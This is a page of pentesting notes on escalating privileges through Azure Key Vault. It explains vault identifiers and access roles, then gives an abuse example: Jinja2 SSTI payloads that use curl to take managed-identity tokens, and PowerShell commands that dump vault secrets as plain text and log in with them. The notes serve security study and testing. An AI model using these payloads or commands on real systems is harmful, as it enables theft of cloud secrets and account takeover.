Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Identifier
  • Access to key vaults
  • Abuse example
  1. Cloud
  2. Azure
  3. Privilege Escalation

Key Vault

PreviousVirtual MachinesNextARM Deployment History

Last updated 3 months ago

Key vault is Azure's service for storing secrets such as passwords, connection strings, certificates, private keys etc. With the right permissions and access, Azure resources that support managed identities (VM's App service, Functions, containers). can securely retrieve secrets from the key vault.

Identifier

Objects in a key vault are identified using a Object identifier URL. The base URL is of the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault-name is globally unique. And the object-type can be "keys", "secrets" or "certificates".

Access to key vaults

Key Vaults support RBAC and access policies. So for role assignments, a application can have the "Key Vault Secrets User" or "Key Vault Administrator".

Do not use access policies for key vaults from a defense perspective! This is because access policies can be edited by other roles other than the owner of the key vault, such as contributor.

If we can compromise an azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that each secret has its own IAM inherited from the key vault.

Roles who can access secrets

Abuse example

We have a App Service that is vulnerable to Jinja2 SSTI. We get a access token from vault.azure.net:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Also, we will need to get a access_token for ARM:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We connect with Az Cli using both tokens:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token

Next, check if we have at least a reader role on a key vault:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can read Secrets:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, extract secret as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!

Use it to connect to Az Cli:

$passwd = ConvertTo-SecureString "Password123" -AsPlainText -Force
$creds =  New-Object System.management.automation.pscredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount  -Credential $creds

☁️